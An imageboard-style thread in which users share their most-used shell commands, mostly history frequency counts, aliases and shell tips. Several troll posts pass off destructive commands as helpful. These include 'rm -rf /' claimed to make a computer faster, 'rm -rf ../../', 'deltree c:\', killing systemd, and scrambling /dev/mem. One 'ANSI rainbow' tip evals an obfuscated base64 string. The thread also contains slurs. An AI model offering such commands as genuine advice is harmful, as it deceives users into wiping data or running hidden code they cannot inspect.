Post your favorite or most used cli commands


Attached: images.jpg (277x182, 6K)

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>python is 2nd
I'm sorry guys
1 116 23.2465% z
2 34 6.81363% python
3 26 5.21042% ps
4 23 4.60922% curl
5 21 4.20842% vim
6 21 4.20842% cat
7 19 3.80762% rm
8 19 3.80762% cd
9 18 3.60721% sshg
10 15 3.00601% ud

Does ^r count as a command

1 116 23.2% z
2 34 6.8% python
3 26 5.2% ps
4 23 4.6% curl
5 21 4.2% vim
6 21 4.2% cat
7 19 3.8% rm
8 19 3.8% cd
9 18 3.6% sshg
10 15 3% ud
11 15 3% pacman
12 15 3% neofetch
13 13 2.6% grep
14 10 2% whois
15 10 2% git
16 9 1.8% ls
17 8 1.6% wget
18 8 1.6% ssh
19 6 1.2% sshc
20 5 1% while
21 5 1% time
22 5 1% exit
23 5 1% awk
24 4 0.8% ping
25 4 0.8% htop
26 2 0.4% sftp
27 2 0.4% nmap
28 2 0.4% history
29 2 0.4% echo
30 2 0.4% #cat
31 1 0.2% zz
32 1 0.2% sudoedit
33 1 0.2% sudo
34 1 0.2% sshny
35 1 0.2% #ssh
36 1 0.2% sort
37 1 0.2% scp
38 1 0.2% man
39 1 0.2% fp
40 1 0.2% for
41 1 0.2% cz
42 1 0.2% clear
43 1 0.2% chmod
44 1 0.2% .b
45 1 0.2% 14eyes

Hopefully the full list can make up for it

git ( git clone to be specific)

rm -rf ../../
>emerge once more

cat ~/.bash_history | sed "s/sudo /sudo\n/" | cut -d" " -f 1 | sort | uniq -c | sort -k1 -nr | head -10

328 sudo
215 nano
156 ls
111 cd
76 apt
48 ssh
41 rm
36 bash
34 systemctl
23 screen


355 ls
326 git
288 cd
119 sudo
79 apt-get
64 apt
57 heroku
39 man
36 ag
30 emacs
26 make
22 rm
18 xinput
17 ssh
17 dropbox
17 cat
15 texdoc
14 snap
13 mkdir
12 grep

Attached: kP6LqQe.png (500x455, 64K)

p casual here

261 sudo
100 apt-get
48 neofetch
30 systemctl
25 apt
23 cd
22 rm
22 mount
22 clear
20 ls

Attached: 1503681423228.jpg (342x316, 14K)

>like cat but safe
thanks, user!


1609 cd
1542 git
731 ls
568 pacman
496 sudo
482 cargo
481 rm
309 nano
307 grep
297 feh
258 convert
196 pacaur
192 python
192 cp
169 vim

I don't know why I enjoyed this so much


Never know when they ram your door open.

That's just too slow my man
The better way to go is full disk encryption and booting off a microSD.
Anything happens you just rip it out and swallow it. Make sure to chew

rm -rf / it makes u're computer go fastar

tail -f filepath
gives you the last bits of a log file of your choosing, and the -f make it "follow" the log, so that it continues to show you whenever there is an update to the log.

What is z and why are you using it so much?


Use it for debugging simple shit all the time.



alias z="xdg-open ' equine'"


>having duplicates in your bash_history
Here you go (license is GPLv3):
set -e -o pipefail
# Delete duplicates oldest-first from .bash_history while preserving order
# and removing trailing whitespace. Run on user login (not boot).
sed 's/\s*$//' "$HOME/.bash_history" | tac | awk '!x[$0]++' | tac >> "$TMPFILE"
mv -f "$TMPFILE" "$HOME/.bash_history"


Also, it's a good idea to set HISTIGNORE in your .bashrc, e.g. HISTIGNORE="cd *:man *:ls *"

>bashlets need to strip duplicates.

lol, why do you retards refuse to use a superior shell already?

setopt hist_ignore_all_dups

# Read info pages like man pages
manfo() { info "$@" | less; }
manfo ls

# Get error messages in standard English instead of system locale:
LC_ALL=C ls doesnotexist

# Correct shitty typing
alias vo,=vim

# Get largest directories by size
du -ch | sort -h

# ANSI rainbow
eval $(echo 'a2Vrf3xvcml\'ZW%3t`r()(r{,52}|r{,});r`2'6a2VrZQo=' | base64 -d)

zsh is great, but you've been blinded by fanboyism. bash has HISTCONTROL=ignoredups

gawk, jq, gnu sed are pretty much my top favorites

Underrated. Niggas keep trying to use sed/grep on json

unironically a good language too. I'm working on a tagged template implementation for javascript.

>his shell has added bloat compiled in
It's not hard to write a trivial script and call it a day.
>bash has HISTCONTROL=ignoredup
Doesn't work as advertised, it only ignores dupes for the current buffer, so having multiple shells open still causes duplication.

my fav command is also which
but my favorite usage of a command uses a different command.
>systemctl kill systemd

lol, have you even read the bash source?

zsh ain't necessarily the best but jesus. none of these shells are fucking "minimal"

my investment strategy algorithm:
wget -qO- | sort -R | head -n 5

85 df
83 ls
61 cd
27 rm
18 nano
18 dmesg
15 oscap
14 ifdown
12 clear
11 find

57 vim
57 adb
41 rn (ranger alias)
32 monitor (monitor switching script)
32 charge (tlp setcharge script)
26 sudo
25 cd
24 ls
20 xrandr
20 git

deltree c:\



$ echo $SHELL
$ history | sed 's/sudo//g' | awk '{print $1}' | awk 'BEGIN {FS="|"} {print $1}' | sort | uniq -c | sort -rn | head -15
948 git
329 pacman
269 man
235 cd
201 makepkg
186 env
178 vim
115 rm
110 cat
90 pacmd
81 youtube-dl
81 curl
77 ls
71 ffmpeg
68 echo


>typing "cmd" in cmd

Attached: 1351570986854.jpg (350x350, 21K)

He could be using PS


Pretty boring

26 ls
23 ssh
16 cd
10 vi
7 su
7 ps
7 man
6 journalctl
6 cat
5 ping
5 java
5 brctl
4 mount
4 lsof

>not using mksh

>not doing ghetto ASLR by running "dd if=/dev/mem | shuf | dd of=/dev/mem

Attached: flat,800x800,075,f.u2[1].jpg (489x476, 37K)

v, vim alias